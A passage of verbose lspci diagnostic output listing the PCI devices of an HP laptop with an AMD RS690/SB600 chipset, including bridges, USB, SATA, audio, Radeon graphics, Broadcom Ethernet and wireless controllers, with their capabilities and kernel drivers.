DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 Bus: primary=00, secondary=01, subordinate=01, sec-latency=0 I/O behind bridge: 00004000-00004fff Memory behind bridge: d0400000-d05fffff Prefetchable memory behind bridge: 00000000c0000000-00000000c7ffffff Secondary status: 66MHz+ FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA+ VGA+ MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [44] HyperTransport: MSI Mapping Enable+ Fixed+ Capabilities: [b0] Subsystem: Hewlett-Packard Company Device 30c2 00:04.0 PCI bridge: Advanced Micro Devices [AMD] nee ATI Device 7914 (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=10, subordinate=10, sec-latency=0 I/O behind bridge: 0000f000-00000fff Memory behind bridge: d0000000-d00fffff Prefetchable memory behind bridge: 00000000fff00000-00000000000fffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA+ VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [50] Power Management version 3 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] Express (v1) Root Port (Slot+), MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;64ns, L1 &lt;1us ExtTag+ RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd+ ExtTag- PhantFunc- AuxPwr- NoSnoop+ MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr- TransPend- LnkCap: Port #1, Speed 2.5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;64ns, L1 &lt;1us ClockPM- Surprise- LLActRep+ BwNot- LnkCtl: ASPM L1 Enabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x1, TrErr- Train- SlotClk+ DLActive+ BWMgmt- ABWMgmt- SltCap: AttnBtn- PwrCtrl- MRL- AttnInd- PwrInd- HotPlug- Surprise- Slot #0, PowerLimit 0.000W; Interlock- NoCompl- SltCtl: Enable: AttnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq- LinkChg- Control: AttnInd Off, PwrInd Off, Power- Interlock- SltSta: Status: AttnBtn- PowerFlt- MRL- CmdCplt- PresDet+ Interlock- Changed: MRL- PresDet+ LinkState- RootCtl: ErrCorrectable- ErrNon-Fatal- ErrFatal- PMEIntEna- CRSVisible- RootCap: CRSVisible- RootSta: PME ReqID 0000, PMEStatus- PMEPending- Capabilities: [80] MSI: Enable+ Count=1/1 Maskable- 64bit- Address: fee0100c Data: 4159 Capabilities: [b0] Subsystem: Hewlett-Packard Company Device 30c2 Capabilities: [b8] HyperTransport: MSI Mapping Enable+ Fixed+ Capabilities: [100 v1] Virtual Channel Caps: LPEVC=0 RefClk=100ns PATEntryBits=1 Arb: Fixed- WRR32- WRR64- WRR128- Ctrl: ArbSelect=Fixed Status: InProgress- VC0: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed- WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=0 ArbSelect=Fixed TC/VC=ff Status: NegoPending- InProgress- Kernel driver in use: pcieport 00:05.0 PCI bridge: Advanced Micro Devices [AMD] nee ATI RS690 PCI to PCI Bridge (PCI Express Port 1) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=20, subordinate=20, sec-latency=0 I/O behind bridge: 00002000-00003fff Memory behind bridge: cc000000-cfffffff Prefetchable memory behind bridge: 00000000fff00000-00000000000fffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA+ VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [50] Power Management version 3 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] Express (v1) Root Port (Slot+), MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;64ns, L1 &lt;1us ExtTag+ RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd+ ExtTag- PhantFunc- AuxPwr- NoSnoop+ MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr- TransPend- LnkCap: Port #247, Speed 2.5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;64ns, L1 &lt;1us ClockPM- Surprise- LLActRep+ BwNot- LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk- ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x16, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- SltCap: AttnBtn- PwrCtrl- MRL- AttnInd- PwrInd- HotPlug- Surprise- Slot #0, PowerLimit 0.000W; Interlock- NoCompl- SltCtl: Enable: AttnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq- LinkChg- Control: AttnInd Off, PwrInd Off, Power- Interlock- SltSta: Status: AttnBtn- PowerFlt- MRL- CmdCplt- PresDet- Interlock- Changed: MRL- PresDet- LinkState- RootCtl: ErrCorrectable- ErrNon-Fatal- ErrFatal- PMEIntEna- CRSVisible- RootCap: CRSVisible- RootSta: PME ReqID 0000, PMEStatus- PMEPending- Capabilities: [80] MSI: Enable+ Count=1/1 Maskable- 64bit- Address: fee0100c Data: 4161 Capabilities: [b0] Subsystem: Hewlett-Packard Company Device 30c2 Capabilities: [b8] HyperTransport: MSI Mapping Enable+ Fixed+ Capabilities: [100 v1] Virtual Channel Caps: LPEVC=0 RefClk=100ns PATEntryBits=1 Arb: Fixed- WRR32- WRR64- WRR128- Ctrl: ArbSelect=Fixed Status: InProgress- VC0: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed- WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=0 ArbSelect=Fixed TC/VC=ff Status: NegoPending- InProgress- Kernel driver in use: pcieport 00:06.0 PCI bridge: Advanced Micro Devices [AMD] nee ATI RS690 PCI to PCI Bridge (PCI Express Port 2) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=30, subordinate=30, sec-latency=0 I/O behind bridge: 0000f000-00000fff Memory behind bridge: c8000000-c80fffff Prefetchable memory behind bridge: 00000000fff00000-00000000000fffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA+ VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [50] Power Management version 3 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] Express (v1) Root Port (Slot+), MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;64ns, L1 &lt;1us ExtTag+ RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd+ ExtTag- PhantFunc- AuxPwr- NoSnoop+ MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr- TransPend- LnkCap: Port #3, Speed 2.5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;64ns, L1 &lt;1us ClockPM- Surprise- LLActRep+ BwNot- LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x1, TrErr- Train- SlotClk+ DLActive+ BWMgmt- ABWMgmt- SltCap: AttnBtn- PwrCtrl- MRL- AttnInd- PwrInd- HotPlug- Surprise- Slot #0, PowerLimit 0.000W; Interlock- NoCompl- SltCtl: Enable: AttnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq- LinkChg- Control: AttnInd Off, PwrInd Off, Power- Interlock- SltSta: Status: AttnBtn- PowerFlt- MRL- CmdCplt- PresDet+ Interlock- Changed: MRL- PresDet+ LinkState- RootCtl: ErrCorrectable- ErrNon-Fatal- ErrFatal- PMEIntEna- CRSVisible- RootCap: CRSVisible- RootSta: PME ReqID 0000, PMEStatus- PMEPending- Capabilities: [80] MSI: Enable+ Count=1/1 Maskable- 64bit- Address: fee0100c Data: 4169 Capabilities: [b0] Subsystem: Hewlett-Packard Company Device 30c2 Capabilities: [b8] HyperTransport: MSI Mapping Enable+ Fixed+ Capabilities: [100 v1] Virtual Channel Caps: LPEVC=0 RefClk=100ns PATEntryBits=1 Arb: Fixed- WRR32- WRR64- WRR128- Ctrl: ArbSelect=Fixed Status: InProgress- VC0: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed- WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=0 ArbSelect=Fixed TC/VC=ff Status: NegoPending- InProgress- Kernel driver in use: pcieport 00:12.0 SATA controller: Advanced Micro Devices [AMD] nee ATI SB600 Non-Raid-5 SATA (prog-if 01 [AHCI 1.0]) Subsystem: Advanced Micro Devices [AMD] nee ATI SB600 Non-Raid-5 SATA Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 16 Region 0: I/O ports at 9000 [size=8] Region 1: I/O ports at 9008 [size=4] Region 2: I/O ports at 9010 [size=8] Region 3: I/O ports at 5018 [size=4] Region 4: I/O ports at 5020 [size=16] Region 5: Memory at d0609000 (32-bit, non-prefetchable) [size=1K] Capabilities: [60] Power Management version 2 Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: ahci 00:13.0 USB controller: Advanced Micro Devices [AMD] nee ATI SB600 USB (OHCI0) (prog-if 10 [OHCI]) Subsystem: Hewlett-Packard Company Device 30c2 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 23 Region 0: Memory at d0601000 (32-bit, non-prefetchable) [size=4K] Kernel driver in use: ohci_hcd 00:13.1 USB controller: Advanced Micro Devices [AMD] nee ATI SB600 USB (OHCI1) (prog-if 10 [OHCI]) Subsystem: Hewlett-Packard Company Device 30c2 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64, Cache Line Size: 64 bytes Interrupt: pin B routed to IRQ 17 Region 0: Memory at d0602000 (32-bit, non-prefetchable) [size=4K] Kernel driver in use: ohci_hcd 00:13.2 USB controller: Advanced Micro Devices [AMD] nee ATI SB600 USB (OHCI2) (prog-if 10 [OHCI]) Subsystem: Hewlett-Packard Company Device 30c2 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64, Cache Line Size: 64 bytes Interrupt: pin C routed to IRQ 17 Region 0: Memory at d0603000 (32-bit, non-prefetchable) [size=4K] Kernel driver in use: ohci_hcd 00:13.3 USB controller: Advanced Micro Devices [AMD] nee ATI SB600 USB (OHCI3) (prog-if 10 [OHCI]) Subsystem: Hewlett-Packard Company Device 30c2 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64, Cache Line Size: 64 bytes Interrupt: pin B routed to IRQ 17 Region 0: Memory at d0604000 (32-bit, non-prefetchable) [size=4K] Kernel driver in use: ohci_hcd 00:13.4 USB controller: Advanced Micro Devices [AMD] nee ATI SB600 USB (OHCI4) (prog-if 10 [OHCI]) Subsystem: Hewlett-Packard Company Device 30c2 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64, Cache Line Size: 64 bytes Interrupt: pin C routed to IRQ 17 Region 0: Memory at d0605000 (32-bit, non-prefetchable) [size=4K] Kernel driver in use: ohci_hcd 00:13.5 USB controller: Advanced Micro Devices [AMD] nee ATI SB600 USB Controller (EHCI) (prog-if 20 [EHCI]) Subsystem: Hewlett-Packard Company Device 30c2 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64, Cache Line Size: 64 bytes Interrupt: pin D routed to IRQ 23 Region 0: Memory at d0606000 (32-bit, non-prefetchable) [size=256] Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold-) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Bridge: PM- B3+ Capabilities: [e4] Debug port: BAR=1 offset=00e0 Kernel driver in use: ehci_hcd 00:14.0 SMBus: Advanced Micro Devices [AMD] nee ATI SBx00 SMBus Controller (rev 14) Subsystem: Hewlett-Packard Company Device 30c2 Control: I/O+ Mem+ BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Region 0: I/O ports at 8200 [size=16] Capabilities: [b0] HyperTransport: MSI Mapping Enable- Fixed+ 00:14.1 IDE interface: Advanced Micro Devices [AMD] nee ATI SB600 IDE (prog-if 82 [Master PriP]) Subsystem: Hewlett-Packard Company Device 30c2 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 16 Region 0: I/O ports at 01f0 [size=8] Region 1: I/O ports at 03f4 [size=1] Region 2: I/O ports at 0170 [size=8] Region 3: I/O ports at 0374 [size=1] Region 4: I/O ports at 5040 [size=16] Kernel driver in use: pata_atiixp 00:14.2 Audio device: Advanced Micro Devices [AMD] nee ATI SBx00 Azalia (Intel HDA) Subsystem: Hewlett-Packard Company Device 30c2 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=slow &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 16 Region 0: Memory at c8100000 (64-bit, non-prefetchable) [size=16K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=55mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: snd_hda_intel 00:14.3 ISA bridge: Advanced Micro Devices [AMD] nee ATI SB600 PCI to LPC Bridge Subsystem: Hewlett-Packard Company Device 30c2 Control: I/O+ Mem+ BusMaster+ SpecCycle+ MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 00:14.4 PCI bridge: Advanced Micro Devices [AMD] nee ATI SBx00 PCI to PCI Bridge (prog-if 01 [Subtractive decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop+ ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 Bus: primary=00, secondary=02, subordinate=03, sec-latency=64 I/O behind bridge: 00001000-00001fff Memory behind bridge: d0100000-d03fffff Prefetchable memory behind bridge: d4000000-d7ffffff Secondary status: 66MHz- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA+ VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- 00:18.0 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] HyperTransport Technology Configuration Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Capabilities: [80] HyperTransport: Host or Secondary Interface Command: WarmRst+ DblEnd- DevNum=0 ChainSide- HostHide+ Slave- &lt;EOCErr- DUL- Link Control: CFlE- CST- CFE- &lt;LkFail- Init+ EOC- TXO- &lt;CRCErr=8 IsocEn- LSEn+ ExtCTL- 64b+ Link Config: MLWI=16bit DwFcIn- MLWO=16bit DwFcOut- LWI=16bit DwFcInEn- LWO=16bit DwFcOutEn- Revision ID: 1.02 Link Frequency: 800MHz Link Error: &lt;Prot- &lt;Ovfl- &lt;EOC- CTLTm- Link Frequency Capability: 200MHz+ 300MHz- 400MHz+ 500MHz- 600MHz+ 800MHz+ 1.0GHz- 1.2GHz- 1.4GHz- 1.6GHz- Vend- Feature Capability: IsocFC- LDTSTOP+ CRCTM- ECTLT- 64bA- UIDRD- ExtRS- UCnfE- 00:18.1 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Address Map Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- 00:18.2 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] DRAM Controller Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- 00:18.3 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Miscellaneous Control Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Kernel driver in use: k8temp 01:05.0 VGA compatible controller: Advanced Micro Devices [AMD] nee ATI RS690M [Radeon X1200 Series] (prog-if 00 [VGA controller]) Subsystem: Hewlett-Packard Company Device 30c2 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64, Cache Line Size: 64 bytes Interrupt: pin B routed to IRQ 19 Region 0: Memory at c0000000 (64-bit, prefetchable) [size=128M] Region 2: Memory at d0400000 (64-bit, non-prefetchable) [size=64K] Region 4: I/O ports at 4000 [size=256] Region 5: Memory at d0500000 (32-bit, non-prefetchable) [size=1M] Expansion ROM at &lt;unassigned&gt; [disabled] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [80] MSI: Enable- Count=1/1 Maskable- 64bit+ Address: 0000000000000000 Data: 0000 02:04.0 CardBus bridge: Ricoh Co Ltd RL5c476 II (rev b6) Subsystem: Hewlett-Packard Company Device 30c2 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 Interrupt: pin A routed to IRQ 20 Region 0: Memory at d0100000 (32-bit, non-prefetchable) [size=4K] Bus: primary=02, secondary=03, subordinate=06, sec-latency=176 Memory window 0: d4000000-d7ffffff (prefetchable) Memory window 1: d8000000-dbffffff I/O window 0: 00001000-000010ff I/O window 1: 00001400-000014ff BridgeCtl: Parity- SERR- ISA- VGA- MAbort- &gt;Reset- 16bInt+ Postpcilib: sysfs_read_vpd: read failed: Connection timed out Write+ 16-bit legacy interface ports at 0001 02:04.1 FireWire (IEEE 1394): Ricoh Co Ltd R5C832 IEEE 1394 Controller (rev 02) (prog-if 10 [OHCI]) Subsystem: Hewlett-Packard Company Device 30c2 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 (500ns min, 1000ns max), Cache Line Size: 64 bytes Interrupt: pin B routed to IRQ 5 Region 0: Memory at d0101000 (32-bit, non-prefetchable) [size=2K] Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=2 PME- 10:00.0 Ethernet controller: Broadcom Corporation NetLink BCM5787M Gigabit Ethernet PCI Express (rev 02) Subsystem: Hewlett-Packard Company Device 30c2 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 43 Region 0: Memory at d0000000 (64-bit, non-prefetchable) [size=64K] Expansion ROM at &lt;ignored&gt; [disabled] Capabilities: [48] Power Management version 3 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst+ PME-Enable- DSel=0 DScale=1 PME- Capabilities: [50] Vital Product Data Not readable Capabilities: [58] Vendor Specific Information: Len=78 &lt;?&gt; Capabilities: [e8] MSI: Enable+ Count=1/1 Maskable- 64bit+ Address: 00000000fee0100c Data: 4189 Capabilities: [d0] Express (v1) Endpoint, MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;4us, L1 unlimited ExtTag+ AttnBtn- AttnInd- PwrInd- RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 512 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr+ TransPend- LnkCap: Port #0, Speed 2.5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;4us, L1 &lt;64us ClockPM+ Surprise- LLActRep- BwNot- LnkCtl: ASPM L1 Enabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM+ AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x1, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- Capabilities: [100 v1] Advanced Error Reporting UESta: DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt- UnxCmplt- RxOF- MalfTLP- ECRC- UnsupReq- ACSViol- UEMsk: DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt- UnxCmplt- RxOF- MalfTLP- ECRC- UnsupReq- ACSViol- UESvrt: DLP+ SDES- TLP- FCP+ CmpltTO- CmpltAbrt- UnxCmplt- RxOF+ MalfTLP+ ECRC- UnsupReq- ACSViol- CESta: RxErr- BadTLP- BadDLLP- Rollover- Timeout- NonFatalErr- CEMsk: RxErr- BadTLP- BadDLLP- Rollover- Timeout- NonFatalErr+ AERCap: First Error Pointer: 00, GenCap+ CGenEn- ChkCap+ ChkEn- Capabilities: [13c v1] Virtual Channel Caps: LPEVC=0 RefClk=100ns PATEntryBits=1 Arb: Fixed- WRR32- WRR64- WRR128- Ctrl: ArbSelect=Fixed Status: InProgress- VC0: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed- WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=0 ArbSelect=Fixed TC/VC=ff Status: NegoPending- InProgress- Capabilities: [160 v1] Device Serial Number 00-1a-4b-ff-fe-76-46-6e Capabilities: [16c v1] Power Budgeting &lt;?&gt; Kernel driver in use: tg3 30:00.0 Network controller: Broadcom Corporation BCM4311 802.11a/b/g (rev 02) Subsystem: Hewlett-Packard Company Broadcom 802.11a/b/g WLAN Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 18 Region 0: Memory at c8000000 (64-bit, non-prefetchable) [size=16K] Capabilities: [40] Power Management version 3 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 NoSoftRst+ PME-Enable- DSel=0 DScale=2 PME- Capabilities: [58] Vendor Specific Information: Len=78 &lt;?&gt; Capabilities: [e8] MSI: Enable- Count=1/1 Maskable- 64bit+ Address: 0000000000000000 Data: 0000 